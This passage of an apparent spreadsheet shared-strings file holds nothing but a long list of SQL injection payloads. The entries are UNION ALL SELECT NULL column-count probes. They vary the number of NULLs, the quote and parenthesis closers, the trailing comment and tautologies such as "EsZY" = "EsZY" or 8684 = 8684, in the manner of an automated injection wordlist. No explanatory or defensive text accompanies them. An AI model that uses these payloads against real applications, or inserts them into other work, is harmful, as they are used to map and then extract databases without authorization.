    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "EsZY" = "EsZY</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "tnls" = "tnls</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "coSK" = "coSK</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "iMNK" = "iMNK</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "IsgO" = "IsgO</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "JScd" = "JScd</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "FUpA" = "FUpA</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "tIZl" = "tIZl</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "MYkA" = "MYkA</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "Hlyf" = "Hlyf</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "FUkc" = "FUkc</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "ahDg" = "ahDg</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "XGkC" = "XGkC</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "Inhb" = "Inhb</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "FAeb" = "FAeb</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "tcGF" = "tcGF</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "OcAM" = "OcAM</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "FlCL" = "FlCL</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "KYuw" = "KYuw</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "Iban" = "Iban</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "GinN" = "GinN</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "RRAY" = "RRAY</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "WmZi" = "WmZi</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "dzIe" = "dzIe</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "QSAG" = "QSAG</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "DMSw" = "DMSw</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "iZQQ" = "iZQQ</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "FPHV" = "FPHV</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "KHYj" LIKE "KHYj</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "MxGt" LIKE "MxGt</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "mnao" LIKE "mnao</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "ePBB" LIKE "ePBB</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "qHmC" LIKE "qHmC</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "xUxO" LIKE "xUxO</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "kYZJ" LIKE "kYZJ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "QCOk" LIKE "QCOk</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "kkyz" LIKE "kkyz</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "NCSn" LIKE "NCSn</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "UrWL" LIKE "UrWL</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "HJCU" LIKE "HJCU</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "kmki" LIKE "kmki</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "xgoV" LIKE "xgoV</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "vBdR" LIKE "vBdR</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "WEub" LIKE "WEub</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "svGx" LIKE "svGx</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "CBnT" LIKE "CBnT</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "jDAJ" LIKE "jDAJ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "gFyr" LIKE "gFyr</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "UJUK" LIKE "UJUK</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "PhRc" LIKE "PhRc</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "YVNb" LIKE "YVNb</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "YJrC" LIKE "YJrC</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "cQhR" LIKE "cQhR</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "WLhn" LIKE "WLhn</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "nfEJ" LIKE "nfEJ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "qnAt" LIKE "qnAt</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "okTX" LIKE "okTX</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "HfvN" LIKE "HfvN</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "GiQR" LIKE "GiQR</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "VvDW" LIKE "VvDW</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "oMHE" LIKE "oMHE</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "yoLp" LIKE "yoLp</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "JCPc" LIKE "JCPc</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "fkvl" LIKE "fkvl</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "oLWt" LIKE "oLWt</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "gClU" LIKE "gClU</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "unGe" LIKE "unGe</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "DfUU" LIKE "DfUU</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 8684 = 8684</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 4354 = 4354</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 4805 = 4805</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 1262 = 1262</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 7550 = 7550</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 6578 = 6578</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 5553 = 5553</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 6986 = 6986</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 3238 = 3238</t>
  </si>
  <si>
